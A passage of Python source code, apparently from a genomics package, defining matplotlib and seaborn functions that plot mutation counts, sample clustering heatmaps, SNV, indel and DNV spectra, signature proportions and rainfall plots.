axes[i][m].ticklabel_format(axis='x', style='sci', scilimits=(-2, 2))\n axes[i][m].set_xlabel('false positive rate 1/Mbp ', fontsize=12)\n axes[i][m].set_ylabel('mutation rate 1/Mbp ', fontsize=12)\n # axes[i][m].grid()\n\n if plot_roc:\n if not return_string:\n __plt.show()\n __plt.close()\n return score_lim_dict, fig\n else:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return score_lim_dict, figdata_png\n else:\n return score_lim_dict, None\n\n\ndef plot_mutation_counts(sample_names=None,\n mutations_dataframe=None,\n unique_only=False,\n return_string=False,\n mutations_filename=None,\n output_dir=None,\n control_samples=None):\n \"\"\"\n\n Plots the number of mutations found in all the samples in different ploidy regions.\n\n :param mutations_dataframe: The dataframe containing the mutations. (default: None) (pandas.DataFrame)\n :param sample_names: list of samples names to plot mutation counts for (default: None) (list of str)\n :param unique_only: If True, only unique mutations are plotted for each sample. (default: False) (boolean)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param mutations_filename: The path to the file, where mutations are stored, if the mutations attribute of the object does not exist, its value will be set to the file defined here. (default: None) (str)\n :param output_dir: the path to the directory where mutation tables are located (default: None) (str)\n :param control_samples: List of sample names that should be used as control samples in the sense, that no unique mutations are expected in them. (The sample names listed here must match a subset of the sample names listed in bam_filename.) (list of str)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"whitegrid\", font=\"DejaVu Sans\")\n except:\n pass\n\n if mutations_dataframe is not None:\n if not mutations_dataframe.__class__ == __pd.core.frame.DataFrame:\n msg = 'Error: Argument \"mutations\" is not a pandas DataFrame.'\n raise ValueError(msg)\n elif sorted(list(mutations_dataframe.columns)) != sorted(['sample_name', 'chr', 'pos', 'type', 'score',\n 'ref', 'mut', 'cov', 'mut_freq', 'cleanliness',\n 'ploidy']):\n msg = 'Error: The DataFrame supplied in argument \"mutations\" does not have the required columns.'\n msg += '\\n'\n msg += 'Make sure to have the following columns: sample_name, chr, pos, type, score, ' \\\n 'ref, mut, cov, mut_freq, cleanliness, ploidy'\n raise ValueError(msg)\n else:\n mutations_dataframe = io.load_mutations(output_dir=output_dir,\n filename=mutations_filename)\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n if control_samples is None:\n print('Warning: list of control samples not defined.')\n control_samples = []\n elif sum([1 for s in control_samples if s not in sample_names]) > 0:\n raise ValueError('List of \"control_samples\" is not a subset of \"sample_names\".')\n\n if unique_only:\n mutations_df = mutations_dataframe[~mutations_dataframe['sample_name'].str.contains(',')]\n else:\n mutations_df = mutations_dataframe\n\n unique_samples = sorted(sample_names)\n\n pos = list(range(len(unique_samples)))\n unique_ploidies = sorted(list(mutations_df['ploidy'].unique()))\n width = 1. / (len(unique_ploidies) + 1)\n\n color_dict_base = {'control': '#008B8B',\n 'treated': '#8B008B'}\n\n color_list = [color_dict_base['control'] if s in control_samples\n else color_dict_base['treated'] for s in unique_samples]\n\n mut_types_all = ['SNV', 'INS', 'DEL']\n\n # Plotting the bars\n fig, axes = __plt.subplots(len(mut_types_all), 1)\n fig.set_size_inches(14, 6 * len(mut_types_all))\n fig.subplots_adjust(top=0.92, left=0.07, right=0.97,\n hspace=0.4, wspace=0.2)\n\n for m in range(len(mut_types_all)):\n for i in range(len(unique_ploidies)):\n filtered_table = mutations_df[\n (mutations_df['type'] == mut_types_all[m]) & (mutations_df['ploidy'] == unique_ploidies[i])]\n count_list = []\n for s in unique_samples:\n count_list.append(filtered_table[filtered_table['sample_name'].str.contains(s)].shape[0])\n sample_counts = __pd.DataFrame()\n sample_counts['sample'] = unique_samples\n sample_counts['count'] = count_list\n\n sample_counts.sort_values(by='sample')\n\n if len(unique_ploidies) == 1:\n a = 1\n else:\n a = 1 - (i + 1) * (1. / len(unique_ploidies))\n barlist = axes[m].bar([p + i * width for p in pos], sample_counts['count'], width, alpha=a,\n color=\"violet\", label=str(int(unique_ploidies[i])))\n for j in range(len(barlist)):\n barlist[j].set_color(color_list[j])\n\n # Set the y axis label\n axes[m].set_ylabel('Mutation count', fontsize=12)\n\n # Set the chart's title\n if unique_only and len(unique_ploidies) == 1:\n title = '\\nUnique ' + mut_types_all[m] + ' counts\\n'\n elif not unique_only and len(unique_ploidies) == 1:\n title = '\\nAll ' + mut_types_all[m] + ' counts\\n'\n if unique_only and len(unique_ploidies) > 1:\n title = '\\nUnique ' + mut_types_all[m] + ' counts grouped by ploidy\\n'\n elif not unique_only and len(unique_ploidies) > 1:\n title = '\\nAll ' + mut_types_all[m] + ' counts grouped by ploidy\\n'\n axes[m].set_title(title, fontsize=14)\n\n # Set the position of the x ticks\n axes[m].set_xticks([p - 0.5 + len(unique_ploidies) * 1 * width for p in pos])\n # Set the labels for the x ticks\n sample_labels = ['\\n'.join([s[i:i + 10] for i in range(0, len(s), 10)]) for s in unique_samples]\n fs = 8\n axes[m].set_xticklabels(sample_labels, rotation=90, fontsize=fs)\n\n # Setting the x-axis and y-axis limits\n axes[m].set_xlim(min([p - 1 + len(unique_ploidies) * 0.5 * width for p in pos]),\n max(pos) + width * (len(unique_ploidies) + 1))\n axes[m].ticklabel_format(axis='y', style='sci', scilimits=(-2, 2))\n axes[m].set_yscale('log')\n # axes[m].grid()\n\n if return_string:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n\n else:\n __plt.show()\n __plt.close()\n return fig\n\n\ndef plot_hierarchical_clustering(sample_names=None,\n mutations_dataframe=None,\n mutations_filename=None,\n output_dir=None,\n return_string=False,\n method='average'):\n \"\"\"\n\n Generates a heatmap based on the number of shared mutations found in all possible sample pairs.\n A dendrogram is also added that is the result of hierarchical clustering of the samples.\n\n :param mutations_dataframe: The dataframe containing the mutations. (default: None) (pandas.DataFrame)\n :param sample_names: list of samples names to plot mutation counts for (default: None) (list of str)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param mutations_filename: The path to the file, where mutations are stored, if the mutations attribute of the object does not exist, its value will be set to the file defined here. (default: None) (str)\n :param output_dir: the path to the directory where mutation tables are located (default: None) (str)\n :param method: method used for seaborn hierarchical clustering (default: 'average') (\"single\", \"complete\", \"average\", \"weighted\", \"median\", \"ward\")\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n if mutations_dataframe is not None:\n if not mutations_dataframe.__class__ == __pd.core.frame.DataFrame:\n msg = 'Error: Argument \"mutations\" is not a pandas DataFrame.'\n raise ValueError(msg)\n elif sorted(list(mutations_dataframe.columns)) != sorted(['sample_name', 'chr', 'pos', 'type', 'score',\n 'ref', 'mut', 'cov', 'mut_freq', 'cleanliness',\n 'ploidy']):\n msg = 'Error: The DataFrame supplied in argument \"mutations\" does not have the required columns.'\n msg += '\\n'\n msg += 'Make sure to have the following columns: sample_name, chr, pos, type, score, ' \\\n 'ref, mut, cov, mut_freq, cleanliness, ploidy'\n raise ValueError(msg)\n else:\n mutations_dataframe = io.load_mutations(output_dir=output_dir,\n filename=mutations_filename)\n\n if sample_names is None:\n sample_names = sorted(\n list(set([item for s in list(mutations_dataframe['sample_name'].unique()) for item in s.split(',')])))\n\n if len(sample_names) < 3:\n raise ValueError('Hierarchical clustering cannot be performed on less than 3 samples.')\n\n c = __np.zeros((len(sample_names), len(sample_names)))\n for i in range(len(sample_names)):\n for j in range(i + 1):\n c[i][j] = mutations_dataframe[(mutations_dataframe[\"sample_name\"].str.contains(sample_names[i])) & (\n mutations_dataframe[\"sample_name\"].str.contains(sample_names[j]))].shape[0]\n c[j][i] = c[i][j]\n\n d = __pd.DataFrame(c)\n d.columns = sample_names\n d.index = sample_names\n\n g = __sns.clustermap(d, method=method, cmap=\"viridis\", robust=True);\n\n if return_string:\n figfile = __BytesIO()\n g.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n return figdata_png\n else:\n __plt.show()\n __plt.close()\n return g\n\n\ndef plot_SNV_spectrum(spectrumDict,\n return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the triplet spectrum for a list of 96-element vectors defined in spectrumDict.\n\n :param spectrumDict: a dictionary containing spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n all_muttypes = [\"ACAA\", \"TGTT\", \"ACCA\", \"GGTT\", \"ACGA\", \"CGTT\", \"ACTA\", \"AGTT\", \"CCAA\", \"TGGT\",\n \"CCCA\", \"GGGT\", \"CCGA\", \"CGGT\", \"CCTA\", \"AGGT\", \"GCAA\", \"TGCT\", \"GCCA\", \"GGCT\",\n \"GCGA\", \"CGCT\", \"GCTA\", \"AGCT\", \"TCAA\", \"TGAT\", \"TCCA\", \"GGAT\", \"TCGA\", \"CGAT\",\n \"TCTA\", \"AGAT\", \"ACAG\", \"TGTC\", \"ACCG\", \"GGTC\", \"ACGG\", \"CGTC\", \"ACTG\", \"AGTC\",\n \"CCAG\", \"TGGC\", \"CCCG\", \"GGGC\", \"CCGG\", \"CGGC\", \"CCTG\", \"AGGC\", \"GCAG\", \"TGCC\",\n \"GCCG\", \"GGCC\", \"GCGG\", \"CGCC\", \"GCTG\", \"AGCC\", \"TCAG\", \"TGAC\", \"TCCG\", \"GGAC\",\n \"TCGG\", \"CGAC\", \"TCTG\", \"AGAC\", \"ACAT\", \"TGTA\", \"ACCT\", \"GGTA\", \"ACGT\", \"CGTA\",\n \"ACTT\", \"AGTA\", \"CCAT\", \"TGGA\", \"CCCT\", \"GGGA\", \"CCGT\", \"CGGA\", \"CCTT\", \"AGGA\",\n \"GCAT\", \"TGCA\", \"GCCT\", \"GGCA\", \"GCGT\", \"CGCA\", \"GCTT\", \"AGCA\", \"TCAT\", \"TGAA\",\n \"TCCT\", \"GGAA\", \"TCGT\", \"CGAA\", \"TCTT\", \"AGAA\", \"ATAA\", \"TATT\", \"ATCA\", \"GATT\",\n \"ATGA\", \"CATT\", \"ATTA\", \"AATT\", \"CTAA\", \"TAGT\", \"CTCA\", \"GAGT\", \"CTGA\", \"CAGT\",\n \"CTTA\", \"AAGT\", \"GTAA\", \"TACT\", \"GTCA\", \"GACT\", \"GTGA\", \"CACT\", \"GTTA\", \"AACT\",\n \"TTAA\", \"TAAT\", \"TTCA\", \"GAAT\", \"TTGA\", \"CAAT\", \"TTTA\", \"AAAT\", \"ATAC\", \"TATG\",\n \"ATCC\", \"GATG\", \"ATGC\", \"CATG\", \"ATTC\", \"AATG\", \"CTAC\", \"TAGG\", \"CTCC\", \"GAGG\",\n \"CTGC\", \"CAGG\", \"CTTC\", \"AAGG\", \"GTAC\", \"TACG\", \"GTCC\", \"GACG\", \"GTGC\", \"CACG\",\n \"GTTC\", \"AACG\", \"TTAC\", \"TAAG\", \"TTCC\", \"GAAG\", \"TTGC\", \"CAAG\", \"TTTC\", \"AAAG\",\n \"ATAG\", \"TATC\", \"ATCG\", \"GATC\", \"ATGG\", \"CATC\", \"ATTG\", \"AATC\", \"CTAG\", \"TAGC\",\n \"CTCG\", \"GAGC\", \"CTGG\", \"CAGC\", \"CTTG\", \"AAGC\", \"GTAG\", \"TACC\", \"GTCG\", \"GACC\",\n \"GTGG\", \"CACC\", \"GTTG\", \"AACC\", \"TTAG\", \"TAAC\", \"TTCG\", \"GAAC\", \"TTGG\", \"CAAC\",\n \"TTTG\", \"AAAC\"]\n\n mut_xlabel = [i[0] + i[1] + i[2] for i in all_muttypes[::2]]\n mut_title = ['C > A', 'C > G', 'C > T', 'T > A', 'T > C', 'T > G']\n\n ind = __np.arange(16)\n width = 0.4\n\n spectrum_colors = []\n spectrum_colors.append('#03bcee')\n spectrum_colors.append('#010101')\n spectrum_colors.append('#e32926')\n spectrum_colors.append('#999999')\n spectrum_colors.append('#a1ce63')\n spectrum_colors.append('#ebc6c4')\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n\n if normalize_to_1:\n spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, 6, sharey=True)\n f.set_size_inches(20, 3)\n\n for i in range(6):\n axarr[i].bar(ind, spectrum[i * 16:(i + 1) * 16], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, 16, 17))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[i * 16:(i + 1) * 16], rotation='vertical', size=9)\n axarr[i].text(0.5, 1.08, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes)\n\n axarr[i].add_patch(\n __Rectangle((0, 1.01), 1, 0.05, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(spectrum) * 1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef plot_indel_spectrum(spectrumDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the indel spectrum, given a dictionary containing 83-element vectors as values.\n\n :param spectrumDict: a dictionary containing spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: True) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n mut_xlabel = ['1', '2', '3', '4', '5', '6+'] * 2 + ['0', '1', '2', '3', '4', '5+'] * 2\n mut_xlabel += ['1', '2', '3', '4', '5', '6+'] * 4 + ['0', '1', '2', '3', '4', '5+'] * 4\n mut_xlabel += ['1', '1', '2', '1', '2', '3', '1', '2', '3', '4', '5+']\n\n mut_title = ['C', 'T', 'C', 'T'] + ['2', '3', '4', '5+'] * 3\n\n subplot_sizes = [6] * 12 + [1, 2, 3, 5]\n width = 0.4\n\n spectrum_colors = []\n spectrum_colors.append('#fdbe6f')\n spectrum_colors.append('#ff8001')\n spectrum_colors.append('#b0dd8b')\n spectrum_colors.append('#36a12e')\n spectrum_colors.append('#fdcab5')\n spectrum_colors.append('#fc8a6a')\n spectrum_colors.append('#f14432')\n spectrum_colors.append('#bc141a')\n spectrum_colors.append('#d0e1f2')\n spectrum_colors.append('#94c4df')\n spectrum_colors.append('#4a98c9')\n spectrum_colors.append('#1764ab')\n spectrum_colors.append('#e2e2ef')\n spectrum_colors.append('#b6b6d8')\n spectrum_colors.append('#8683bd')\n spectrum_colors.append('#61409b')\n\n text_color = ['black', 'white', 'black', 'white'] + ['black', 'black', 'black', 'white'] * 3\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n if __np.sum(spectrum_orig) == 0:\n print('No indels were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n id_spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n id_spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, len(subplot_sizes), sharey=True, gridspec_kw={'width_ratios': subplot_sizes})\n f.set_size_inches(20, 3)\n\n for i in range(len(subplot_sizes)):\n ind = __np.arange(subplot_sizes[i])\n start_pos = __np.int(__np.sum(subplot_sizes[:i]))\n end_pos = start_pos + subplot_sizes[i]\n axarr[i].bar(ind, id_spectrum[start_pos:end_pos], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, subplot_sizes[i], subplot_sizes[i] + 1))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[start_pos:end_pos], rotation='horizontal', size=9)\n axarr[i].text(0.5, 1.05, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes,\n color=text_color[i])\n\n axarr[i].add_patch(\n __Rectangle((0, 1.03), 1, 0.08, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(id_spectrum) * 1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n axarr[0].text(1.1, 1.2, \"1 bp deletion\", size=14, ha=\"center\", transform=axarr[0].transAxes)\n axarr[0].text(1.1, -0.2, \"homopolymer length\", size=13, ha=\"center\", transform=axarr[0].transAxes)\n axarr[2].text(1.1, 1.2, \"1 bp insertion\", size=14, ha=\"center\", transform=axarr[2].transAxes)\n axarr[2].text(1.1, -0.2, \"homopolymer length\", size=13, ha=\"center\", transform=axarr[2].transAxes)\n axarr[5].text(1.1, 1.2, \">1 bp deletions at repeats\\n(deletion length)\", size=14, ha=\"center\",\n transform=axarr[5].transAxes)\n axarr[5].text(1.1, -0.2, \"number of repeat units\", size=13, ha=\"center\", transform=axarr[5].transAxes)\n axarr[9].text(1.1, 1.2, \">1 bp insertions at repeats\\n(insertion length)\", size=14, ha=\"center\",\n transform=axarr[9].transAxes)\n axarr[9].text(1.1, -0.2, \"number of repeat units\", size=13, ha=\"center\", transform=axarr[9].transAxes)\n axarr[14].text(0.7, 1.2, \"deletions with microhomology\\n(deletion length)\", size=14, ha=\"center\",\n transform=axarr[14].transAxes)\n axarr[14].text(0.7, -0.2, \"microhomology length\", size=13, ha=\"center\", transform=axarr[14].transAxes)\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef plot_DNV_heatmap(matrixDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plot DNVs (dinucleotide variations) as a heatmap for a database of mutations.\n\n :param matrixDict: a dictionary containing 12x12 element matrices as values and sample names as keys (dictionary)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, nothing.\n\n \"\"\"\n\n base_changes = ['C>A', 'C>G', 'C>T', 'T>A', 'T>C', 'T>G', 'A>C', 'A>G', 'A>T', 'G>A', 'G>C', 'G>T']\n\n figs = []\n\n for sample_name, matrix in matrixDict.items():\n\n if __np.sum(matrix) == 0:\n print('No DNVs were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n matrix_to_plot = matrix / __np.sum(matrix)\n else:\n matrix_to_plot = matrix\n df_m = __pd.DataFrame(matrix_to_plot, columns=base_changes, index=base_changes)\n colormap = __plt.cm.YlGnBu\n mask = __np.zeros_like(matrix_to_plot)\n for i in range(mask.shape[0]):\n for j in range(mask.shape[1]):\n if i >= mask.shape[0] - j:\n mask[i, j] = True\n with __sns.axes_style(\"white\"):\n if not normalize_to_1:\n ax = __sns.heatmap(df_m, square=True, mask=mask, cmap=colormap, annot=True)\n else:\n ax = __sns.heatmap(df_m, square=True, mask=mask, cmap=colormap, annot=False)\n\n __plt.xlabel(\"\\n3' base change\", fontsize=14)\n __plt.ylabel(\"5' base change\\n\", fontsize=14)\n __plt.title(sample_name + '\\n', fontsize=16);\n\n if return_string:\n figfile = __BytesIO()\n __plt.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n\n else:\n f = __plt.gcf()\n figs.append(f)\n __plt.show()\n __plt.close()\n\n return figs\n\n\ndef plot_DNV_spectrum(spectrumDict, return_string=False, normalize_to_1=False):\n \"\"\"\n\n Plots the DNV spectrum, given a dictionary containing the spectra as values.\n\n :param spectrumDict: a dictionary containing DNV spectra as values and sample names as keys (dictionary)\n :param normalize_to_1: If True, results are plotted as percentages, instead of counts. (default: False) (bool)\n :param return_string: If True, only a temporary plot is generated and its base64 code is returned, that can be included in HTML files. (default: False) (bool)\n\n :returns: If the return_string value is True, a base64 encoded string of the image. Otherwise, a list of matplotlib figures.\n\n \"\"\"\n try:\n __sns.set(style=\"white\", font=\"DejaVu Sans\")\n except:\n pass\n\n DBS_types = [\"AC>CA\", \"AC>CG\", \"AC>CT\", \"AC>GA\", \"AC>GG\", \"AC>GT\", \"AC>TA\", \"AC>TG\", \"AC>TT\", \"AT>CA\",\n \"AT>CC\",\n \"AT>CG\", \"AT>GA\", \"AT>GC\", \"AT>TA\", \"CC>AA\", \"CC>AG\", \"CC>AT\", \"CC>GA\", \"CC>GG\", \"CC>GT\",\n \"CC>TA\",\n \"CC>TG\", \"CC>TT\", \"CG>AT\", \"CG>GC\", \"CG>GT\", \"CG>TA\", \"CG>TC\", \"CG>TT\", \"CT>AA\", \"CT>AC\",\n \"CT>AG\",\n \"CT>GA\", \"CT>GC\", \"CT>GG\", \"CT>TA\", \"CT>TC\", \"CT>TG\", \"GC>AA\", \"GC>AG\", \"GC>AT\", \"GC>CA\",\n \"GC>CG\",\n \"GC>TA\", \"TA>AT\", \"TA>CG\", \"TA>CT\", \"TA>GC\", \"TA>GG\", \"TA>GT\", \"TC>AA\", \"TC>AG\", \"TC>AT\",\n \"TC>CA\",\n \"TC>CG\", \"TC>CT\", \"TC>GA\", \"TC>GG\", \"TC>GT\", \"TG>AA\", \"TG>AC\", \"TG>AT\", \"TG>CA\", \"TG>CC\",\n \"TG>CT\",\n \"TG>GA\", \"TG>GC\", \"TG>GT\", \"TT>AA\", \"TT>AC\", \"TT>AG\", \"TT>CA\", \"TT>CC\", \"TT>CG\", \"TT>GA\",\n \"TT>GC\",\n \"TT>GG\"]\n\n mut_xlabel = [k.split('>')[1] for k in DBS_types]\n mut_title = ['AC>NN', 'AT>NN', 'CC>NN', 'CG>NN', 'CT>NN', 'GC>NN', 'TA>NN', 'TC>NN', 'TG>NN', 'TT>NN']\n\n subplot_sizes = [9, 6, 9, 6, 9, 6, 6, 9, 9, 9]\n width = 0.4\n\n spectrum_colors = []\n spectrum_colors.append('#a6cee3')\n spectrum_colors.append('#1f78b4')\n spectrum_colors.append('#b2df8a')\n spectrum_colors.append('#33a02c')\n spectrum_colors.append('#fb9a99')\n spectrum_colors.append('#e31a1c')\n spectrum_colors.append('#fdbf6f')\n spectrum_colors.append('#ff7f00')\n spectrum_colors.append('#cab2d6')\n spectrum_colors.append('#6a3d9a')\n\n figs = []\n\n for sample_name, spectrum_orig in spectrumDict.items():\n if __np.sum(spectrum_orig) == 0:\n print('No DNVs were found in sample ' + sample_name)\n else:\n if normalize_to_1:\n spectrum = __np.array(spectrum_orig) / __np.sum(spectrum_orig)\n else:\n spectrum = spectrum_orig\n\n f, axarr = __plt.subplots(1, len(subplot_sizes), sharey=True, gridspec_kw={'width_ratios': subplot_sizes})\n f.set_size_inches(20, 3)\n\n for i in range(len(subplot_sizes)):\n ind = __np.arange(subplot_sizes[i])\n start_pos = __np.int(__np.sum(subplot_sizes[:i]))\n end_pos = start_pos + subplot_sizes[i]\n axarr[i].bar(ind, spectrum[start_pos:end_pos], width, color=spectrum_colors[i],\n edgecolor=spectrum_colors[i])\n axarr[i].xaxis.set_ticks(__np.linspace(0, subplot_sizes[i], subplot_sizes[i] + 1))\n axarr[i].set_xticks(ind + width)\n axarr[i].xaxis.set_tick_params(size=0)\n axarr[i].yaxis.set_tick_params(size=0)\n axarr[i].set_xticklabels(mut_xlabel[start_pos:end_pos], rotation='vertical', size=9)\n axarr[i].text(0.5, 1.08, mut_title[i], size=12, ha=\"center\", transform=axarr[i].transAxes)\n\n axarr[i].add_patch(\n __Rectangle((0, 1.01), 1, 0.05, color=spectrum_colors[i], transform=axarr[i].transAxes,\n clip_on=False))\n axarr[i].spines['right'].set_visible(False)\n axarr[i].spines['top'].set_visible(False)\n axarr[i].set_ylim(0, max(spectrum) * 1.1)\n if i == 0:\n axarr[i].set_ylabel(sample_name + '\\n', fontsize=12)\n if i != 0:\n axarr[i].spines['left'].set_visible(False)\n\n if normalize_to_1:\n vals = axarr[0].get_yticks()\n axarr[0].set_yticklabels(['{:,.1%}'.format(x) for x in vals])\n\n if return_string:\n figfile = __BytesIO()\n f.savefig(figfile, bbox_inches='tight', format='png')\n __plt.close()\n figfile.seek(0)\n figdata_png = __base64.b64encode(figfile.getvalue())\n figs.append(figdata_png)\n else:\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n try:\n __sns.set_style(\"whitegrid\")\n except:\n pass\n\n return figs\n\n\ndef __plot_spectrum_decomposition(sample_names, theta_matrix, sig_names, spectrum_type=None):\n \"\"\"\n\n Plot the final set of proportions for the signatures.\n\n :param sample_names: The list of sample names analysed. (list of str)\n :param theta_matrix: The final set of mixture proportions for each sample. (numpy.array)\n :param sig_names: The names of the signatures. (numpy.array)\n :param spectrum_type: The type of mutations analysed (\"SNV\", \"DNV\", \"indel\"). (default: None) (str)\n\n \"\"\"\n\n try:\n __sns.set_style(\"white\")\n except:\n pass\n\n ind = __np.arange(len(sig_names))\n width = 0.4\n\n c = '#a6cee3'\n\n if spectrum_type == 'DNV':\n c = '#b2df8a'\n elif spectrum_type == 'SNV':\n c = '#fdbf6f'\n elif spectrum_type == 'indel':\n c = '#cab2d6'\n\n figs = []\n\n for sID, sample_name in enumerate(sample_names):\n f, ax = __plt.subplots()\n f.set_size_inches(20, 3)\n\n ax.bar(ind, theta_matrix[sID], width, color=c, edgecolor=c)\n ax.xaxis.set_ticks(__np.linspace(0, len(sig_names), len(sig_names) + 1))\n ax.set_xticks(ind)\n ax.xaxis.set_tick_params(size=0)\n ax.yaxis.set_tick_params(size=0)\n ax.set_xticklabels(sig_names, rotation='vertical', size=12)\n\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.set_ylim(0, 1)\n ax.set_ylabel(sample_name + '\\n', fontsize=12)\n\n vals = ax.get_yticks()\n ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])\n\n for vID, v in enumerate(theta_matrix[sID]):\n if (v > 0):\n if (len(sig_names) < 25):\n ax.text(ind[vID], v + 0.05, str(round(v * 100, 2)) + '%', size=10, horizontalalignment='center')\n else:\n ax.text(ind[vID], v + 0.05, str(round(v * 100, 2)) + '%', size=10,\n rotation='vertical', horizontalalignment='center',\n verticalalignment='bottom')\n\n __plt.show()\n figs.append(f)\n __plt.close(f)\n\n return figs\n\n\ndef __get_rainfall_data_for_sample(mutations_dataframe, chromosomes, chrom_length):\n \"\"\"\n\n :param mutations_dataframe: a pandas DataFrame containing mutations (pandas.DataFrame)\n :param chromosomes: a list of chromosomes for the genome (list of str)\n :param chrom_length: a list of chromosome lengths (list of int)\n\n :returns: a dictionary containing points to plot for each mutation type\n\n \"\"\"\n mutation_types = ['C > A', 'G > T', 'C > G', 'G > C', 'C > T', 'G > A', 'T > A', 'A > T', 'T > C', 'A > G', 'T > G',\n 'A > C']\n\n mutation_type_dict = {i: [] for i in range(8)}\n\n for chrom in list(mutations_dataframe['chr'].unique()):\n abs_chrom_pos = sum(chrom_length[:chromosomes.index(chrom)])\n if mutations_dataframe[mutations_dataframe['chr'] == chrom].shape[0] > 1:\n pos_before = -42\n for rID, r in mutations_dataframe[mutations_dataframe['chr'] == chrom].sort_values(by='pos').iterrows():\n if pos_before != -42:\n if r['type'] == 'SNV':\n muttype = int(__np.floor(mutation_types.index(r['ref'] + ' > ' + r['mut']) / 2))\n elif r['type'] == 'INS':\n muttype = 6\n elif r['type'] == 'DEL':\n muttype = 7\n mutation_type_dict[muttype].append([abs_chrom_pos + r['pos'], r['pos'] - pos_before])\n pos_before = r['pos']\n\n return mutation_type_dict\n\n\ndef plot_rainfall(mutations_dataframe,\n chromosomes=None, chrom_length=None, ref_fasta=None,\n sample_names=None,\n return_string=False,\n muttypes=['SNV', 'INS', 'DEL'],\n unique_only=True,\n plot_range=None):\n \"\"\"\n\n Plot a rainfall plot of the mutations. The horizontal axis is the genomic position of each mutation and the vertical axis is the genomic\n difference measured from the previous mutation.\n\n :param mutations_dataframe: the pandas.DataFrame containing all mutations 